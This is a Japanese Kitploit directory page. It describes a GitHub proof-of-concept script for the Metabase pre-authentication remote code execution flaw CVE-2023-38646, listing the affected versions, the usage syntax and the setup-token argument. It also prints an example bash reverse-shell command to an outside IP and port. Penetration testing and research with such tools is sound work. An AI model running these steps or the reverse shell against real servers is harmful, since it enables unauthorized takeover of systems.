Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-38646 — Metabase の事前認証RCE(CVE-2023-38646)のエクスプロイトスクリプト | Kitploit
ツール/GitHubGitHub/pyr0sec/cve-2023-38646
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubpyr0sec/cve-2023-38646

CVE-2023-38646

Metabase の事前認証RCE(CVE-2023-38646)のエクスプロイトスクリプト

リポジトリを見る
11222年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Metabase 事前認証RCE (CVE-2023-38646) POC

これは、Metabaseのログインソフトウェアのリモートコード実行脆弱性を悪用するPythonスクリプトです。認証前にサーバ上で任意のコマンドを実行できます。

脆弱なバージョンは、Metabaseオープンソース0.46.6.1未満、Metabase Enterprise 1.46.6.1未満です。

使用方法

python3 exploit.py -u URL -t TOKEN -c COMMAND

引数

-h, --help            このヘルプメッセージを表示して終了
-u URL, --url URL     ターゲットURL
-t TOKEN, --token TOKEN
                      /api/session/properties で見つかったSetup-Token
-c COMMAND, --command COMMAND
                      ターゲットホストで実行するコマンド

使用例

image

使用したコマンド: bash -i >& /dev/tcp/10.10.14.26/9001 0>&1

参考文献

Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646)

ツールをダウンロード